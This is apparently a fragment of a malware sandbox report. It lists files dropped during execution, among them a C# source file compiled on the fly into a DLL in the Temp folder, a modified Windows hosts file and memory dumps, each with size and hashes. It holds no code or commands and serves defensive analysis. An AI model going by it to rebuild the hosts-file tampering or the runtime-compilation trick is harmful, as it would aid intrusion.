                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ur11woet.zl4.ps1

                                  Filesize

                                  60B

                                  MD5

                                  d17fe0a3f47be24a6453e9ef58c94641

                                  SHA1

                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                  SHA256

                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                  SHA512

                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                • C:\Users\Admin\AppData\Local\Temp\fgpenwup\fgpenwup.dll

                                  Filesize

                                  4KB

                                  MD5

                                  9cbb6aa1ba9022288c79bd9182bed25a

                                  SHA1

                                  b1cee5be50b39a1fd430f500d3dba812a74382ee

                                  SHA256

                                  f9b293852567960b2541b1faec046b458c1dede883fc686e0f48a5f8c7675877

                                  SHA512

                                  74c6a770a53eb71cd4c2baff9ea4568cc4ccdf12ccfcfdefb0c3010dfe2692919626032ea16a18c82cda1ef3eea8e74a2b50e7bfd8232b07d5df5b5c1deac6f9

                                • C:\Windows\System32\drivers\etc\hosts

                                  Filesize

                                  2KB

                                  MD5

                                  6e2386469072b80f18d5722d07afdc0b

                                  SHA1

                                  032d13e364833d7276fcab8a5b2759e79182880f

                                  SHA256

                                  ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

                                  SHA512

                                  e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

                                • \??\c:\Users\Admin\AppData\Local\Temp\fgpenwup\CSC138F0812606943FDAAFDE81F4E9BCB11.TMP

                                  Filesize

                                  652B

                                  MD5

                                  31d1b091a444e2c39514c01133d14c16

                                  SHA1

                                  ec01e65e7bf41ec441e56ff6792f3840d15984c3

                                  SHA256

                                  cc5b1fb68a7da2668c0bc5681288ef672c967768895693231ffdcff9f1060c56

                                  SHA512

                                  6951f659e9b2f6afe6082bb1a8d2e6e589b689a4e1e369dbacef479d8bebfac25bb77b9804bc5fcfd27abdedb951866cefb62c5b657a7353da03b9b2471d69d3

                                • \??\c:\Users\Admin\AppData\Local\Temp\fgpenwup\fgpenwup.0.cs

                                  Filesize

                                  1004B

                                  MD5

                                  c76055a0388b713a1eabe16130684dc3

                                  SHA1

                                  ee11e84cf41d8a43340f7102e17660072906c402

                                  SHA256

                                  8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                  SHA512

                                  22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                • \??\c:\Users\Admin\AppData\Local\Temp\fgpenwup\fgpenwup.cmdline

                                  Filesize

                                  607B

                                  MD5

                                  037c56a281e22ae8739bd8d5f36dbc17

                                  SHA1

                                  cc394aa855b72dd954f00baa0de8cc79f7ce2488

                                  SHA256

                                  236042cfea0f81150a69af841635e91a017799a3638a8dc11a70aab95f14d882

                                  SHA512

                                  b7fcf960bc1dc649e1c684f3cc68a0d572aaf4e58fae8b25eac7af96e7eeb7656aff6024ed4e187e38b517f92b6a52892512961f8e2dc504df0707aa517b6efc

                                • memory/1944-63-0x000001BAB58E0000-0x000001BAB58E8000-memory.dmp

                                  Filesize

                                  32KB

                                • memory/3292-7-0x00000141FAFD0000-0x00000141FAFF2000-memory.dmp

                                  Filesize

                                  136KB